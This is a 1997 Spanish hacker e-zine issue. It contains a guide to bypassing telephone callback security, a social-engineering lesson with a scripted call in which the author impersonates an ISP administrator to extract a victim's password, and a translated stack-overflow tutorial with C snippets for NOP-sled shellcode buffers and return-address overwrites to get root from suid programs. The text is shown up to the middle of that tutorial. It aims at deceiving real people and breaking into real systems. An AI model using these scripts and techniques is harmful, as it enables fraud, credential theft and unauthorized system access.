home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / jjf / jjf001.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  78.1 KB  |  1,738 lines

  1.  
  2.                         /─\           /─\      /────────\
  3.                         │█│           │█│      │█/──────/
  4.                         │█│           │█│      │█\──\
  5.                    /─\  │█│      /─\  │█│      │█/──/
  6.                    │█│  │█│      │█│  │█│      │█│
  7.                    │█ \/ █│  /\  │█ \/ █│  /\  │█│  /\
  8.                    \──────/  \/  \──────/  \/  \─/  \/
  9.                      
  10.                           / HACKERS TEAM JOURNAL
  11.  
  12.                             VOL. #1, Nº1, 1997.
  13.  
  14. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  15.  
  16.      Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
  17.            de la informacion aqui expuesta y tampoco tiene que estar
  18.            de acuerdo con lo que sus colaboradores opinen.
  19.            Tampoco esperamos que la gente use la informacion aqui expuesta
  20.            para hacer daño ya que tan solo es con fines didacticos.
  21.  
  22. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  23.  
  24.      #CURRENT MEMBERS :
  25.  
  26.      - CONDE VAMPIRO     - CODER  H/P/V  EDITOR
  27.      - MAC CRACK BISHOP  - CODER  C      WEBMASTER
  28.      
  29.      #WEB OFICIAL :
  30.  
  31.      - http://www.angelfire.com/mi/JJFHackers
  32.  
  33.      #E-MAIL OFICIAL :
  34.  
  35.      - jjf_team@hotmail.com
  36.  
  37.      #COLABORADORES CON ESTE NUMERO :
  38.  
  39.      - VANDALS  
  40.      - IPgh0st  (Underhack)
  41.      - NOBODY
  42.  
  43. ------------------------------------------------------------------------------
  44. ------------------------------------------------------------------------------
  45. ------------------------------------------------------------------------------
  46.  
  47.   - INDICE.
  48.  
  49.     TITULO                                        AUTOR
  50.   ------------________________________________---------------
  51.  
  52.  
  53.   * EDITORIAL ________________________________ J.J.F. / HACKERS TEAM
  54.   * TECNICAS HACKER __________________________ VANDALS.
  55.   * CURSO DE HACK I __________________________ CONDE VAMPIRO.
  56.   * STACK OVERFLOW EXPLOiTS __________________ IPgh0st.
  57.   * CONFERENCIA DE LA GC EN EL SIMO __________ NOBODY.
  58.   * TEST HACKER ______________________________ MAC CRACK BISHOP.
  59.   * NOTICIAS UNDERGROUND _____________________ CONDE VAMPIRO.
  60.  
  61.  
  62.  
  63. ------------------------------------------------------------------------------
  64. ██████████████████████████████████████████████████████████████████████████████
  65. ------------------------------------------------------------------------------
  66.  
  67.   -------------
  68.   │ EDITORIAL │
  69.   -------------
  70.  
  71.         - J.J.F. / HACKERS TEAM - JOURNAL es un nuevo e-zine underground
  72.   en lengua hispana en el cual se discutira, enseñara, exprondra, denunciara
  73.   sobre H/P/C/V y temas relacionados (internet, programacion, etc...) pero
  74.   por el contrario no se incluira temas como anarkia, ufologia, gore, temas
  75.   oscuros y cosas por el estilo.
  76.  
  77.         Desde aqui animar a todos los interesados que nos ayuden aportando
  78.   articulos para crear un e-zine a la altura de los demas existentes en
  79.   nuestra lengua y que sobre todo nos guste a todos y tengamos algo util
  80.   en nuestros HD.
  81.  
  82.         Quiero señalar que este primer numero es de tanteo, por lo que no
  83.   seais muy criticos, ya que se ira adoptando las medidas necesarias para ir
  84.   mejorando y sobre todo para aquellos que solo critican, que nos envien
  85.   un articulo para ver de que son capaces o es que solo saben criticar!!
  86.  
  87.         Se permite su libre distribuccion siempre y cuando el e-zine no sea
  88.   alterado de ningun forma entre toda la scene. Esta prohibida su
  89.   distribucion en medios comerciales.
  90.  
  91.         El web oficial del - J.J.F. / HACKERS TEAM - JOURNAL sera el
  92.   siguiente, ademas tambien aqui podras hallar informacion y programas que
  93.   no se repartiran con el e-zine :
  94.  
  95.   http://www.angelfire.com/mi/JJFHackers
  96.  
  97.         Pero si alquien quiere ser distribuidor oficial que nos envie un mail
  98.   indicandonoslo, para darle un link en nuestro web o quieres enviar un
  99.   articulo o cualquier cosa que quieras decir, escribe a:
  100.  
  101.   jjf_team@hotmail.com
  102.  
  103.         Pues aqui se acaba lo que la editorial tenia que decir y esperamos que
  104.   te agrade este e-zine y seas un asiduo a el.
  105.  
  106.                                                    - J.J.F. / HACKERS TEAM -
  107.  
  108. ------------------------------------------------------------------------------
  109. ██████████████████████████████████████████████████████████████████████████████
  110. ------------------------------------------------------------------------------
  111.  
  112.  **************************************************************
  113.  *                                                            *
  114.  *       Tema: Tecnicas Hackers                               *
  115.  *       Proposito: Enseñanza sobre tecnicas                  *
  116.  *       Autor: Vandals                                       *
  117.  *                                                            *
  118.  *                                                            *
  119.  *       (*)Este es el primer articulo sobre un cursillo de   *
  120.  *          Tecnicas Hackers.                                 *
  121.  *                                                            *
  122.  *                                                            *
  123.  **************************************************************
  124.  
  125.         En primer lugar kiero dejar totalmente claro ke ni el autor ni el
  126.  grupo - J.J.F. / HACKERS TEAM - , se hara responsable de la utilizacion ke
  127.  se vaya a hacer con esta informacion. Simplemente distribuimos esta
  128.  informacion con fines educativos y para ke todos tengan acceso a la misma.
  129.  
  130.         Este cursillo, sera dividido en cinco articulos, siendo este el
  131.  primero. En cada articulo se hara su explicacion correspondiente del uso de
  132.  la tecnica a tratar. El cursillo se dividira en cinco articulos, los cuales
  133.  seran:
  134.  
  135.  1-. Unidades de regreso de llamada.
  136.  
  137.  2-. Puertas traseras.
  138.  
  139.  3-. La decodificacion.
  140.  
  141.  4-. Desvio de llamadas.
  142.  
  143.  5-. Velocidad.
  144.  
  145.  
  146.         Asi es komo voy a dividir este cursillo, para ke te vayas haciendo
  147.  una idea de lo ke se va a tratar en el mismo. Bueno, ahora si ke voy a dejar
  148.  de hablar tanto y me voy a meter directamente a lo ke realmente nos interesa.
  149.  
  150.  
  151.  1-. UNIDADES DE REGRESO DE LLAMADA
  152.  
  153.     En ingles, "regreso de llamada" se dice "callback", asi ke de 
  154.  ahora en adelante utilizare la palabra inglesa simplemente por komodidad.
  155.  Bueno, las callback son una gran invencion de seguridad, pero con la mayoria
  156.  de sistemas telefonicos es posible ke un hacker use los siguientes pasos 
  157.  para conseguir ke una unidad de callback ke usa la misma linea para recibir 
  158.  llamadas como para realizarlas le de lo ke le interesa.
  159.  
  160.         En primer lugar, el hacker llama al callback he introduce un codigo
  161.  (ID) autorizado (esto no es muy dificil de conseguir, como veremos ahora).
  162.  Despues de ke introduce el ID, el hacker mantiene la linea abierta (es decir,
  163.  sin colgar). Cuando la unidad de callback recoje la llamada para llamar al
  164.  usuario de vuelta, el hacker esta ahi, esperando para encontrarse con el.
  165.  
  166.         El codigo (ID) como dije antes, es facil de obtener para el hacker,
  167.  porke estos codigos no significan ser precauciones de seguridad. La unidad de
  168.  callback da los mismos codigos para poder mantener las llamadas ke le llegan
  169.  desde el ordenador.
  170.         Los ID's no son mas privados ke la mayoria de los numeros de telefono
  171.  de cualkier tio. Algunas unidades de callback se refieren al codigo como 
  172.  "location identification numbers" y algunas de estas localizaciones son
  173.  utilizadas por diferentes personas, asi ke sus ID's son perfectamente
  174.  conocidos. En algunos casos, las unidades de callback tambien tienen ciertos
  175.  ID's ke estan siempre definidos como "default". Una vez ke el hacker ha
  176.  introducido el ID y la unidad de callback ha recojido la llamada para
  177.  llamarlo de vuelta, el hacker debe o no decidir ke la unidad de callback se
  178.  kede pensando, esto se hace, marcando el numero correcto. Luego, lo uniko ke
  179.  nos keda, es encender el ordenata y comunicar con el sistema ;)
  180.  Sin embargo, si hemos tenido algun problema en mantener la linea con este
  181.  metodo todavia tenemos otra opcion, la cual seria: El Interceptor.
  182.  
  183.  INTERCEPTOR
  184.  
  185.     Mantener la linea, solo funcionara con unidades de callback ke usen
  186.  la misma linea telefonica para hacer llamadas internas y externas. Algunas
  187.  unidades de callback usan diferentes lineas para llamadas internas y
  188.  externas; los numeros 555-3820 hasta el 555-3830 son dedicados a usuarios
  189.  de llamadas internas y los numeros 555-2020 hasta el 555-2030 son dedicados
  190.  para ke el ordenador haga llamadas externas. La unica cosa ke un hacker
  191.  necesita para conseguir entrar en estos sistemas es un ordenador y un poco de
  192.  tiempo (incluso no es necesario un ID).
  193.  
  194.         En primer lugar, el hacker llama a alguien por medio de llamada
  195.  externa, ke por supuesto no habra respuesta. Tarde o temprano, mientras el
  196.  hacker tiene el ordenata esperando, escuchando el marcado de linea
  197.  (dial tone), un usuario autorizado, llamara por medio de linea interna y
  198.  este, esperara a ser llamado por la unidad de callback. Normalmente, el
  199.  hacker tendra ke esperar menos de una hora, pero sabemos de sobra ke el
  200.  ordenata del hacker es perfectamente capaz de esperar durante dias si fuera
  201.  necesario.
  202.  
  203.         Luego, la unidad de callback tomara el codigo de autorizacion del
  204.  usuario, mantendra la linea, verificara el codigo y dara linea para llamar de
  205.  vuelta al usuario. Si la unidad intenta hacer llamada externa el hacker
  206.  entonces tendra ya el marcado de linea (dial tone) y entonces el ordenata del
  207.  hacker toca un tono ke suena como el marcado de una linea. Entonces el
  208.  ordenata llamara por medio del codigo autorizado del usuario y despues de
  209.  esto, el hacker puede ya conectar su ordenata al sistema y ya estaria dentro.
  210.  Despues, lo ke viene a continuacion seria otro caso.
  211.  
  212.         Si ademas, el hacker fuera totalmente serio, lo ke haria seria
  213.  descodificar los tonos producidos por el mainframe, de tal manera ke
  214.  obtendria el numero de telefono del usuario al ke el sistema estaba llamando.
  215.  A continuacion, el hacker llamaria a esa persona y por medio de su ordenata
  216.  haria ruidos extraños ke sonarian komo ke el callback lo esta llamando, pero
  217.  ke por alguna razon no funciona la llamada. De esta manera el hacker
  218.  justificaria la llamada del callback.
  219.  
  220.         Bueno, espero ke este primer capitulo te sirve de ayuda, y a la vez,
  221.  seas capaz de llevar a cabo nuevas cosas ;)
  222.  
  223.  Vandals 
  224. ------------------------------------------------------------------------------
  225. ██████████████████████████████████████████████████████████████████████████████
  226. ------------------------------------------------------------------------------
  227.  
  228.                               - CURSO DE HACK - 
  229.                                   CHAPTER I
  230.  
  231.         Pues aqui empezaremos un curso sobre el tema que mas nos gusta,
  232.    claro esta el Hacking. Por supuesto sera para aquellos que no sepan nada
  233.    o muy poco, ya que se daran cosas muy basicas hasta llegar a altos vuelos.
  234.         Para seguir este curso en necesario conocer un poco internet, s.o.,
  235.    programacion en C y telecomunicaciones. Algunos de estos temas tambien se
  236.    daran aqui pero de pasada como por ejemplo el unix, al contrario que de C
  237.    el cual no se introducira a el, pero si que habra programas en C para
  238.    nuestros propositos.
  239.    Ya basta de charla y empecemos con algo de Hack.
  240.  
  241.    - Ingenieria Social.
  242.  
  243.         La ingenieria social es todo un arte dentro del HACKING, ya que segun
  244.    nuestras habilidades podremos conseguir lo que queramos desde numeros
  245.    de telefonos, passwords, informacion confidencial, etc...
  246.    Basicamente consiste en hacernos pasar por otra persona normalmente por
  247.    el admimistrador de un sistema informatico, pero tambien podemos elegir
  248.    otra figura como por ejemplo un chica ( los chicos siempre estan
  249.    dispuestos a ayudar a una chica en apuros }:-)
  250.         Cuando ya sabemos por quien nos vamos a hacer pasar, llamanos por
  251.    telefono o incluso el irc (por mail tabiem se puede pero es otra historia)
  252.    y nos ponemos en contacto con nuestra victima y le metenos una bola para
  253.    que nos de su login y password para conectarse a internet justificando
  254.    que hemos tenidos problemas con el servidor.
  255.  
  256.    Un ejemplo podria ser esto :  C= CONDE VAMPIRO.   V=VICTIMA.
  257.  
  258.    C= HOLA, ESTA EL SEÑOR JUAN GARCIA, POR FAVOR.
  259.    V= SI, SOY YO.
  260.  
  261.    C= PUES LLAMABA DE SU PROVEEDOR DE INTERNET ARRAKIS. SOY ANGEL MARTIN
  262.       EL ADMINISTRADOR.
  263.    V= HHAA SI, OCURRE ALGO ?
  264.  
  265.    C= PUES LA VERDAD ES QUE ULTIMANENTE HEMOS TENIDO PROBLEMAS CON NUESTROS
  266.       ROUTERS (lo mas seguro es que sepa que es esto :), Y QUERIA
  267.       PREGUNTARLE SI USTED HA TENIDO PROBLEMAS CON SU ACCESO?
  268.    V= PUES NO.
  269.  
  270.    C= QUE RARO, TODO EL MUNDO NOS HA DICHO QUE SI.
  271.    V= PUES YO NO HE NOTADO NADA, AUNQUE ULTIMANTE HE CONECTADO POCO.
  272.  
  273.    C= PUES MEJOR PARA USTED PERO DE TODAS FORMAS ME PODIA DAR SU LOGIN Y
  274.       PASSWORD, PARA QUE PUEDA CONFIRMAR QUE TODO ESTA CORRECTO.
  275.    V= MI LOGIN Y PASSWORD ???
  276.  
  277.    C= PUES SI, PARA PODER VERIFICAR SU CUENTA Y TAMBIEN ME PODRE DAR MAS PRISA
  278.       EN HACER MI TRABAJO, NO SE PREOCUPE QUE EN 2 O 3 DIAS LE VUELVO A
  279.       LLAMAR Y LE DIGO COMO ESTA TODO. (siempre muy alegre)
  280.    V= BUENO, VALE. MI LOGIN ES JGARCIA Y MI PASSWORD XXXXXXX.
  281.  
  282.    C= MUCHAS GRACIAS POR SU AYUDA Y DENTRO DE NADA LE LLAMO Y LE INFORMO SOBRE
  283.       SU ESTADO EN NUESTRO SERVIDOR. ADIOS
  284.    V= OK, DE NADA Y ADIOS.
  285.  
  286.         Logicamente en esta conversacion yo sabia algunos datos de la persona,
  287.    pero tambien se puede hacer sin saber nada como haciendonos pasar por una
  288.    chica en el irc la cual necesita ayuda para configurar su cuenta pero no
  289.    sabe nada de nada ;-)
  290.    Para que la ingenieria social funcione conviene tomar unas medidas.
  291.  
  292.    - Parece siempre confiados, nunca dudar.
  293.    - Saber de que hablamos, meter algun tecnicismo.
  294.    - Procurar no insistir mucho ya que podia sospechar.
  295.    - Si tenemos algo de informacion de la victima mucho mejor.
  296.    - No dar muchos datos personales de uno mismo.
  297.    
  298.         Con esto que os acabo de explicar y aplicando vuestra imaginacion
  299.    podreis conseguir mucha informacion para empezar a ser unos Hackers.
  300.  
  301.                                                            CONDE VAMPIRO
  302.                                                     - J.J.F. / HACKERS TEAM -
  303.  
  304. ------------------------------------------------------------------------------
  305. ██████████████████████████████████████████████████████████████████████████████
  306. ------------------------------------------------------------------------------
  307.  
  308.      °STACK OVERFLOW EXPLOiTS EN LiNUX/BSDOS/FREEBSD/SUNOS/SOLARiS/HP-UX°
  309.  
  310.                        THC Magazine nº3 1996 por Plasmoid
  311.  
  312.                          \/\-traducido por IPgh0st-/\/
  313.  
  314.  
  315.  °introduccion°
  316.  ~~~~~~~~~~~~~~
  317.         bienvenido al mundo de los stack overflows (DesBordAmIeNtoS de PilAs),
  318.  pensaba en escribir un articulo explicando la operacion completa de esta
  319.  clase de overflows en pc's con unix, pero cuando lei el numero #49 de la
  320.  Phrack me di cuenta de que alguien ya habia escrito un articulo de esta
  321.  clase. bueno, si quieres saber mßs sobre la base tecnica (programacion en
  322.  ensamblador/debugging) de los stack overflows en sistemas linux y quieres
  323.  leer un excelente articulo consigue el nº 49 de la Phrack Magazine, articulo
  324.  14 por aleph one, el articulo mas completo que jamas habia visto, un gran
  325.  trabajo! (phrack49.zip) pero si no estas interesado en entender cientos de
  326.  lineas en ensamblador i80836 y deseas tener una guia mas praßctica, continua
  327.  leyendo este articulo para aprender facilmente como usar los exploits de
  328.  overflow en varios sistemas unix.
  329.  
  330.  °contenidos°
  331.  ~~~~~~~~~~~~
  332.  
  333.                   [°a°]    °la pila - pequeña introduccion°
  334.                   [°b°]    °estructura de la pila°
  335.                   [°c°]    °jugando con la direccion de retorno°
  336.                   [°d°]    °ejecutando una shell en ensamblador°
  337.                   [°e°]    °averiguando la direccion real de la pila°
  338.                   [°f°]    °variables de entorno/command line°
  339.                   [°g°]    °palabras finales°
  340.  
  341.            exploit[°1°]    °mount.c  - version linux: < 2.0.8°
  342.            exploit[°2°]    °rdist.c  - todas las versiones bsd: 2.0°
  343.            exploit[°3°]    °rlogin.c - version solaris: 2.5 & 2.5.1°
  344.  
  345.           apendice[°A°]    °codigo asm y c para ejecutar°
  346.           apendice[°B°]    °comandos nop para diferentes sistemas°
  347.           apendice[°C°]    °get_sp() para diferentes sistemas°
  348.           apendice[°D°]    °findsuid.sh - shellscript°
  349.  
  350.  
  351.  
  352.  [°a°] °la pila - pequeña introduccion°
  353.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  354.         la funcion principal de cualquier CPU es procesar y mover datos.
  355.  Mientras se procesan o se mueven esos datos la CPU necesita un lugar en el 
  356.  que poder guardar rapidamente informacion importante debido al espacio
  357.  limitado de los registros. Esta informacion se guarda en la pila. La pila es
  358.  una parte especial de la memoria a la que se puede acceder con comandos
  359.  especiales muy rapidos. La pila es variable en cuanto a tamaño y posicion.
  360.  
  361.         p.ej. si un registro N esta siendo usado y un sub-procedimiento que
  362.  tambien necesite dicho registro N es ejecutado la CPU guardara el valor del
  363.  registro N en la pila y lo restaurara cuando el procedimiento haya
  364.  finalizado. Para mejorar la velocidad de todo este proceso, la CPU emplea
  365.  los comandos especiales de la pila que son mas rapidos que los movimientos
  366.  normales en la memoria.
  367.  
  368.         p.ej. si un procedimiento es ejecutado la CPU necesita saber a donde
  369.  debe regresar cuando el procedimiento haya acabado, y por ello esta
  370.  "direccion de retorno" se guarda en la pila antes de llevar a cabo el
  371.  procedimiento y despues de haberlo finalizado, la CPU salta a esa direccion
  372.  de retorno almacenada en la pila.
  373.  
  374.         Existe una segunda funcion de la pila. Si un programa crea o recibe
  375.  datos, el nuevo campo de datos se almacenara en la memoria, todos los
  376.  programas emplean campos de datos dinamicos para almacenar dicha informacion.
  377.  La CPU crea dichos campos en la pila si se necesitan y los elimina si ya no
  378.  se van a necesitar mas.
  379.  
  380.         p.ej. si un procedimiento tiene que intercambiar el valor de dos
  381.  variables (a <-> b), necesita una tercera variable c para almacenar
  382.  un valor:
  383.               c <- a
  384.               a <- b
  385.               b <- c
  386.  
  387.         la variable c se instalaria en la pila y se eliminarIa una vez que el
  388.  proceso hubiese terminado.
  389.  
  390.          seguro que ahora recuerdas mis palabras en la introduccion
  391.  prometiendo algo como "crear exploits facilmente sin tener que aprender toda
  392.  la mierda de detras". Bueno lo siento pero necesitas conocer algunas cosas
  393.  antes e intentare explicarlas de la forma mas simple posible. (podria haber
  394.  explicado todo esto en ensamblador ;]
  395.  
  396.  [°b°] °estructura de la pila°
  397.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  398.         La pila estß estructurada de un modo que confunde a veces a la gente
  399.  (como a mi), el primer valor almacenado sera leido el ultimo y el ultimo
  400.  valor que fue almacenado se leera el primero, esto simplemente se llama
  401.  "last in, first out" (El uLtiMo QuE EnTrA, eL PrimErO qUe sAlE) o LIFO.
  402.  Ahora analicemos mas detenidaamente la pila, imaginemos que acabamos de
  403.  ejecutar un proceso en un programa (para que no te aburras: luego haremos
  404.  esto para conseguir privilegios de rOOt). Cußl seria el aspecto de la pila
  405.  si dicho procedimiento requiere el uso de algunas variables locales
  406.  (dinamicas) propias?
  407.  
  408.                            .
  409.                            .
  410.                            :   ...                 .  .
  411.                            |-----------------------:
  412.               -2048 bytes  |   array local 1[1024] |  ...
  413.                            |-----------------------|
  414.               -1024 bytes  |   array local2[1024]  |  tamaño 1024 bytes
  415.                            |-----------------------|
  416.  posicion actual de la pila|   puntero base        |  tamaño 4 bytes
  417.                            |-----------------------|
  418.                  +4 bytes  |  direccion de retorno |  tamaño 4 bytes
  419.                            |-----------------------|
  420.                  +4 bytes  :   parßmetros ...      |  ...
  421.                            .                       :
  422.                                                    .  .
  423.  
  424.         como puedes ver las diferentes variables mencionadas y la informacion
  425.  son almacenadas en la pila. Todas las CPU's utilizan un puntero de pila cuya
  426.  mision es señalar la posicion actual, se llama SP (de Stack Pointer). Las
  427.  partes interesantes de la pila son el array local2 y la direccion de
  428.  retorno, no nos preocuparemos del resto porque lo que queremos es conseguir
  429.  privilegios de root y ya esta.
  430.  
  431.  [°c°] °jugando con la direcci≤n de retorno°
  432.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  433.  
  434.         Como podras recordar, antes de ejecutar un procedimiento la CPU
  435.  guarda la direccion de retorno en la pila, si el procedimiento termina
  436.  entonces la pila saltara a la direccion de retorno y continuara. Pero si el
  437.  procedimiento escribe tantos bytes en una variable local que supera su
  438.  tamaño maximo, se sobreescribira la direccion de retorno y esto se llama
  439.  overflow (dEsBordAmiEntO).
  440.  
  441.          p.ej. si se escribe el caracter X 1032 veces (1028+4) en el array
  442.  local2 de la figura de arriba, el procedimiento sobreescribira su propia
  443.  direccion de retorno. Y la pila tendra este aspecto:
  444.                                      
  445.                            .
  446.                            :   ...                 .  .
  447.                            |-----------------------:
  448.               -2048 bytes  |   array local 1[1024] |  ...
  449.                            |-----------------------|
  450.               -1024 bytes  |   1024 veces "X"      |  tamaño 1024 bytes
  451.                            |-----------------------|
  452.  posicion actual de la pila|      4 veces "X"      |  tamaño 4 bytes
  453.                            |-----------------------|
  454.                  +4 bytes  |      4 veces "X"      |  tamaño 4 bytes
  455.                            |-----------------------|
  456.                  +4 bytes  :   parametros ...      |  ...
  457.                            .                       :
  458.                                                   .  .
  459.  
  460.         En vez de escribir el caracter "X" en la direccion de retorno
  461.  podriamos escribir una nueva direccion en la pila, asi forzariamos al
  462.  programa a saltar al lugar que nosotros queramos!
  463.         Seria muy inteligente si saltaramos a una direccion donde hemos
  464.  colocado algo de codigo en ensamblador que haga algo interesante (adivinas
  465.  que?), podriamos crear este codigo ensamblador en la variable local; en el
  466.  ejemplo array local2:
  467.  
  468.                            .
  469.                            :   ...                 .
  470.                            |-----------------------:
  471.               -2048 bytes  |   array local 1[1024] |
  472.                            |-----------------------|
  473.               -1024 bytes  |   nuestro codigo      | < -
  474.                            |-----------------------|    |
  475.  posicion actual de la pila|   4 bytes de basura   |    |
  476.                            |-----------------------|    |
  477.                  +4 bytes  | direccion del codigo  | ___|
  478.                            |-----------------------|
  479.                  +4 bytes  :   parametros ...      |
  480.                            .                       :
  481.                                                    .
  482.  
  483.         Si el propietario del programa es r00t y tiene el flag de suid de tal
  484.  modo que un usuario normal puede ejecutarlo y le dara al usuario privilegios
  485.  de r00t mientras sea ejecutado, nuestro codigo podria sernos de ayuda en
  486.  nuestros propositos! Pero como?
  487.  
  488.  [°d°] °ejecutando una shell en ensamblador°
  489.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  490.         Si nuestro codigo ejecutase una shell normal y hubiesemos creado el
  491.  desbordamiento en un programa con el flag suid y cuyo propietario fuese el
  492.  root entonces tendriamos una magnifica shell de root a nuestra disposicion y
  493.  finalmente el sistema seria hackeado. Lo que necesitamos justo ahora es un
  494.  trozo de codigo ensamblador que ejecute una shell, bueno no es estrictamente
  495.  necesario que ejecute una shell puedes ejecutar cualquier otro programa.
  496.         Puedes encontrar el codigo correspondiente para varios sistemas en el
  497.  apendice [A] en ensamblador puro y compilado en c con el nombre "execshell".
  498.  
  499.         Si aun asi quieres saber como desensamblar dicho codigo lee el
  500.  articulo 14 de Phrack Magazine #49 o ponte en contacto conmigo via email. Se
  501.  ha añadido "/bin/sh" al codigo en la mayoria de los casos, si quieres
  502.  ejecutar un programa diferente simplemente modifica el campo correspondiente
  503.  a tu gusto.
  504.         Para garantizar que nuestro codigo funcione lo copiamos en el campo
  505.  de datos junto con muchos nops que luego seran copiados a la variable local
  506.  (nop= no operation). Este campo de datos necesita ser mayor que la variable
  507.  local para poder sobreescribir la direccion de retorno.  En el siguiente
  508.  ejemplo lv_size es el tamaño de la variable local que queremos desbordar y
  509.  buffer es el nombre del campo de datos (que tambien es local).
  510.  
  511.  ej. #define lv_size=1024
  512.      char buffer[lv_size+8]
  513.  
  514.         Añadimos exactamente 8 bytes, mira mas detenidamente la pila de
  515.  arriba y sabras por que. Si queremos sobreescribir la direccion de retorno
  516.  tenemos que sobreescribir 4 bytes el puntero base y 4 bytes la direccion de
  517.  retorno.
  518.         El campo de datos buffer deberia aparecer asi:
  519.  
  520.      ... <nop> <nop> <nop> <nop> <nop> <codigo que ejecuta una shell>
  521.  
  522.         Analiza este codigo en c para aprender como podemos hacer esto,
  523.  lv_size es una abreviatura de "local variable size", execshell es el char
  524.  field con nuestro codigo ensamblador y el path de la shell que queremos
  525.  ejecutar. ptr es un puntero que se±ala hacia el campo que copiaremos sobre
  526.  la variable local.
  527.  
  528.  e.g. la version facil:    for(i=0;i<lv_size-strlen(execshell);i++)
  529.                            ptr[i]=0x90;
  530.                            for(i=0;i<strlen(execshell);i++)
  531.                             ptr[i+lv_size-strlen(execshell)]=execshell[i];
  532.  
  533.  e.g. la manera elegante:  memset(ptr,0x90,lv_size-strlen(execshell));
  534.                            ptr+=lv_size-strlen(execshell);
  535.                            for(i=0;i<strlen(execshell);i++)
  536.                             *(ptr++)=execshell[i];
  537.  
  538.         Estos ejemplos estan pensados para sistemas unix porque emplean 0x90
  539.  que es el codigo para el comando nop, en otras plataformas tienes que usar
  540.  otros codigos para los nops. He incluido los codigos correspondientes del
  541.  nop para varios sistemas, mira el apendice [B].
  542.         Usare la version facil en mis exploits porque no soy un programador
  543.  de c profesional y prefiero indexar como en ensamblador. Ya hemos llenado el
  544.  buffer con nuestro codigo y algunos nops y ya nos encontramos cerca de
  545.  nuestra meta, convertirnos en r00t.
  546.  
  547.  [°e°] °averiguando la direccion real de la pila°
  548.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  549.         Recuerdas que dijimos que la pila es variable en posicion y tamaño?
  550.  Si no, lee de nuevo [b] para refrescar tu mente. Empleamos una pequeña
  551.  funcion para averiguar la direccion actual de la pila guardando el SP, esta
  552.  direcion es el comienzo de la pila antes de instalar las variables locales y
  553.  la direccion de retorno, lo llamara OSP (old SP, SP vIejA) en el ejemplo.
  554.  
  555.         Tenemos que sumar un offset variable al OSP, este offset tiene que
  556.  ser de un tamaño tal que la CPU se encuentre un nop cuando salte a la
  557.  direccion de retorno.
  558.                            .                       .
  559.                            :                       .
  560.                     OSP -> |-----------------------:        ------
  561.               -2048 bytes  |   array local 1[1024] |              | offset
  562.                            |-----------------------|              | mas grande
  563.               -1024 bytes  |   <...>               |              | que
  564.                            |   <nop>               |              | 1024
  565.                            |   <nop>               |        ______|
  566.                            |   <nop>               | < -   OSP + offset
  567.                            |   <nop>               |    |
  568.                            |   <nuestro codigo>    |    |
  569.                            |-----------------------|    |
  570.  posicion actual de la pila|   4 bytes de basura   |    |
  571.                            |-----------------------|    |
  572.                  +4 bytes  | direccion: OSP+offset | ___|
  573.                            |-----------------------|
  574.                  +4 bytes  :   parametros ...      |
  575.                            .                       :
  576.                                                   .
  577.  
  578.         En el ejemplo tenemos una variable local delante de la variable
  579.  manipulada, por lo tanto tenemos que generar un offset que sea mas grande
  580.  que el tamaño de esta variable.
  581.         Para poder averiguar el valor del SP, usamos una funcion llamada
  582.  get_sp(), por supuesto existen diferentes metodos para obtener este valor en
  583.  los distintos sistemas unix, he incluido varias versiones en el apendice [C].
  584.          ptr2 es un puntero dword a ptr que señala hacia la direccion de
  585.  retorno en el buffer.
  586.  
  587.  ej. el codigo correcto: ptr2=(long *)ptr;
  588.                          *ptr2=get_sp()+offset;
  589.  
  590.  ej. el codigo robusto: ptr2=(long *)ptr;
  591.                         for(i=1;i<8;i++)
  592.                         *(ptr2++)=get_sp()+offset;
  593.  
  594.         Empleare el codigo robusto en mis exploits porque escribe la
  595.  direccion de retorno 8 veces en la pila, asi si la direccion de la pila que
  596.  habiamos estimado esta equivocada, tenemos todavia otros 7 sitios a los que
  597.  podria saltar.
  598.  
  599.  [°f°] °variables de entorno y de la linea de comandos°
  600.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  601.         Seguro que ya estas cansado de toda esta base tecnica y todo el rollo,
  602.  tienes razon, es hora de buscar un objetivo y atacarlo. El programa que se
  603.  deberia atacar debe tener como propietario al root y tiene que tener
  604.  configurado el suid. Si quieres encontrar este tipo de programas simplemente
  605.  utiliza la shell findsuid del apendice [D].
  606.         Si has leido las secciones previas detenidamente ya deberias saber
  607.  como desbordar la pila usando una variable local, pero como puedo detectar
  608.  si un programa es vulnerable a este bug de desbordamiento? Existen dos
  609.  maneras de pasar variables a un programa, las variables de entorno y las de
  610.  la linea de comandos
  611.  
  612.  ej. variable de la linea de comandos: cat /test.file
  613.                                        ^ variable (type: char[256])
  614.  
  615.         Despues de cargar el codigo maquina del programa y ejecutar los
  616.  primeros procedimientos el programa copiara la variable a un buffer, si no
  617.  existe comprobacion de tamaño puedes usar dicha variable para desbordar la
  618.  pila; para averiguar el tamaño de la variable de la linea de comandos prueba
  619.  poniendo muchos caracteres en la linea de comandos. (por ej. 1024+4, 256+4,
  620.  512+4,...) si el programa te muestra el mensaje "segmentation fault" ("error
  621.  de segmentaci≤n"), puedes usar el programa para obtener root. Por supuesto
  622.  existen programas con lineas de comando enormes, como por ejemplo 8000 bytes.
  623.          Si tienes una lista de archivos suid/root en tu sistema, comprueba
  624.  si son vulnerables en la linea de comandos. La segunda posibilidad es pasar
  625.  la variable empleando una variable de entorno.
  626.  
  627.  ej. variable de entorno: set TERM=1234
  628.  
  629.         el programa copiara la variable TERM a un buffer, pero el tamaño de
  630.  este buffer puede variar, por tanto para desbordarlo tendras que probar con
  631.  diferentes tamaños como 256, 512, 1024, 2048, etc. Encontrar programas que
  632.  utilicen variables de  entorno no es facil, por supuesto sabras que algunos
  633.  programas necesitan leer informacion del sistema desde variables de entorno;
  634.  la mejor manera de averiguarlo es mirar directamente en los archivos de
  635.  codigo fuente en c.
